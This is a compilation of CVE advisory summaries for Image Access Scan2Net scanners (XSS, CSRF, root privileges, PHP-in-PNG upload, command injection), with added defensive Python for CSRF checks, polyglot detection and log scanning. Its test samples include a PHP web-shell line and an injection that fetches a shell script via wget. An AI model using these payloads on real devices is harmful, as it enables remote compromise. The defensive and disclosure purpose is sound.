CVE-2024-28142 – Stored Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2024-28142
Due to missing input sanitization, an attacker can perform cross-site scripting attacks and run arbitrary JavaScript in the browsers of other users. The "File Name" page (/cgi/uset.cgi?-cfilename) in the User Settings menu improperly filters the "file name" and wildcard character input fields. By exploiting the wildcard character feature, attackers are able to store arbitrary JavaScript code, which is triggered whenever the page is viewed afterwards, e.g. by higher-privileged users such as admins. This attack can even be performed without being logged in, because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" user can be changed. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2024-28141 – Cross-Site Request Forgery
https://notcve.org/view.php?id=CVE-2024-28141
The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link. For example, an attacker can forge malicious links to reset the admin password or create new users. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-352: Cross-Site Request Forgery (CSRF) •
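The protection the advisory says is missing, as an added example (this is not code from the Scan2Net firmware, SEC Consult or Image Access): a session-bound synchronizer token plus an Origin/Referer check, with state-changing actions refused on GET so a forged link cannot reset a password. The origin "https://scanner.example", the form field name "csrf_token" and the server secret are assumptions for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumed values for the example: the device UI's own origin and a server-side
# secret (load it from configuration in practice, never hard-code it).
ALLOWED_ORIGIN = "https://scanner.example"
SERVER_SECRET = b"demo-secret-rotate-me"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token: random nonce plus an HMAC binding it to the session,
    so a token leaked from one session cannot be replayed in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Constant-time check of a submitted token against the session it was issued for."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers: dict) -> bool:
    """Second layer: browsers send Origin (or at least Referer) on cross-site
    requests, so anything that does not come from our own origin is rejected."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    p = urlparse(source)
    return f"{p.scheme}://{p.netloc}" == ALLOWED_ORIGIN


def state_change_allowed(method: str, headers: dict, form: dict, session_id: str) -> bool:
    """Gate every state-changing handler (password reset, user creation, ...)
    behind this: POST only, same origin, valid session-bound token."""
    if method.upper() != "POST":
        return False  # a forged link is a GET; never change state on GET
    return origin_allowed(headers) and verify_csrf_token(session_id, form.get("csrf_token", ""))


if __name__ == "__main__":
    sid = "session-of-admin"
    token = issue_csrf_token(sid)
    print(state_change_allowed("POST", {"Origin": ALLOWED_ORIGIN}, {"csrf_token": token}, sid))
    print(state_change_allowed("POST", {"Origin": "https://attacker.example"}, {"csrf_token": token}, sid))
    print(state_change_allowed("GET", {"Referer": ALLOWED_ORIGIN + "/admin.html"}, {"csrf_token": token}, sid))
```

The token is the primary control; the origin check is defence in depth, since some same-site navigations carry no Origin header and a Referer can be suppressed by policy. Marking the session cookie SameSite=Strict adds a third, browser-enforced layer.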
CVE-2024-28140 – Violation of Least Privilege Principle
https://notcve.org/view.php?id=CVE-2024-28140
The scanner device boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user. This can be confirmed by running "ps aux" as the root user and observing the output. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-250: Execution with Unnecessary Privileges •
CVE-2024-47946 – OS Command Execution through Arbitrary File Upload
https://notcve.org/view.php?id=CVE-2024-47946
If the attacker has access to a valid Poweruser session, remote code execution is possible because specially crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP code executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data". • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-434: Unrestricted Upload of File with Dangerous Type •
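A server-side check that would have stopped the upload described above, as an added example (not code from the Scan2Net firmware, SEC Consult or Image Access): walk the PNG chunk structure, verify lengths and CRCs, and refuse the file if a PHP open tag appears in any chunk or in bytes appended after IEND. The sample PNGs are constructed inline; the chunk types used (tEXt) and the payload are assumptions for the demonstration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# PHP open tags as the interpreter's lexer would see them in the raw bytes.
PHP_MARKERS = (b"<?php", b"<?=")


def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one PNG chunk with a correct CRC (used to build the samples)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(extra_chunks=()) -> bytes:
    """Constructed 1x1 greyscale PNG; extra_chunks are inserted after IHDR."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # w, h, depth, colour, comp, filter, interlace
    idat = zlib.compress(b"\x00\x00")                    # filter byte + one pixel
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + b"".join(extra_chunks)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def iter_png_chunks(data: bytes):
    """Yield (type, payload, offset, size) per chunk, verifying length and CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while True:
        header = data[pos:pos + 8]
        if len(header) < 8:
            raise ValueError("truncated file or missing IEND")
        length, ctype = struct.unpack(">I4s", header)
        payload = data[pos + 8:pos + 8 + length]
        crc_raw = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_raw) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if struct.unpack(">I", crc_raw)[0] != (zlib.crc32(ctype + payload) & 0xFFFFFFFF):
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype.decode("latin-1"), payload, pos, 12 + length
        pos += 12 + length
        if ctype == b"IEND":
            return


def find_php_payloads(data: bytes) -> list:
    """Where a PHP open tag appears: chunk type names, or 'trailing' for bytes
    appended after IEND (image viewers ignore them, the PHP lexer does not)."""
    hits = []
    end = len(data)
    for ctype, payload, offset, size in iter_png_chunks(data):
        if any(m in payload for m in PHP_MARKERS):
            hits.append(ctype)
        end = offset + size
    if any(m in data[end:] for m in PHP_MARKERS):
        hits.append("trailing")
    return hits


def accept_upload(data: bytes) -> bool:
    """Gate for a background/lock-screen upload: well-formed PNG, no PHP tags."""
    try:
        return find_php_payloads(data) == []
    except ValueError:
        return False


if __name__ == "__main__":
    polyglot = build_png([png_chunk(b"tEXt", b"Comment\x00<?php system($_GET['c']); ?>")])
    print("clean accepted:", accept_upload(build_png()))
    print("polyglot findings:", find_php_payloads(polyglot))
```

Content inspection alone is a weak control: the stronger fix is to store uploads outside the web root (or in a directory where the web server does not hand .png files to the PHP interpreter) and to re-encode every accepted image with an image library, which discards ancillary chunks and trailing data regardless of what they contain.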
CVE-2024-28138 – OS Command Injection
https://notcve.org/view.php?id=CVE-2024-28138
An unauthenticated attacker with network access to the affected device's web interface can execute any system command via the "msg_events.php" script as the www-data user. The HTTP GET parameter "data" is not properly sanitized. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
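Detection logic for the injection described above, as an added example (not code from SEC Consult, Image Access or the notcve.org page): parse web-server access logs, isolate requests to msg_events.php, decode the "data" parameter and flag values carrying shell metacharacters. The combined log format and the sample lines are constructed for the example; the script path and parameter name come from the advisory text.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Characters that terminate or chain a shell command or escape a quoted argument.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

# Constructed sample log lines: one benign call, two injection attempts,
# one unrelated script with a ';' in it, one unrelated POST.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2024:12:00:01 +0000] "GET /msg_events.php?data=status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2024:12:00:07 +0000] "GET /msg_events.php?data=status%3Bid HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '10.0.0.9 - - [10/Oct/2024:12:00:09 +0000] "GET /msg_events.php?data=x%7C%7Cwget%20http%3A%2F%2F10.0.0.9%2Fp.sh HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '10.0.0.5 - - [10/Oct/2024:12:00:12 +0000] "GET /index.php?data=a%3Bb HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2024:12:00:15 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "curl/8.4.0"',
]


def flag_command_injection(lines, script="/msg_events.php", param="data"):
    """Return one finding per request to `script` whose `param` value contains
    shell metacharacters, after single and double percent-decoding."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(script):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            twice = unquote(value)  # catches %253B-style double encoding
            if SHELL_META.search(value) or SHELL_META.search(twice):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "data": value,
                })
    return findings


if __name__ == "__main__":
    for f in flag_command_injection(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} data={f['data']!r}")
```

Because the parameter travels in a GET query string, it lands in ordinary access logs, which makes this retrospective sweep possible; a 200 status on a flagged request is worth treating as a likely compromise of the www-data account rather than a blocked attempt.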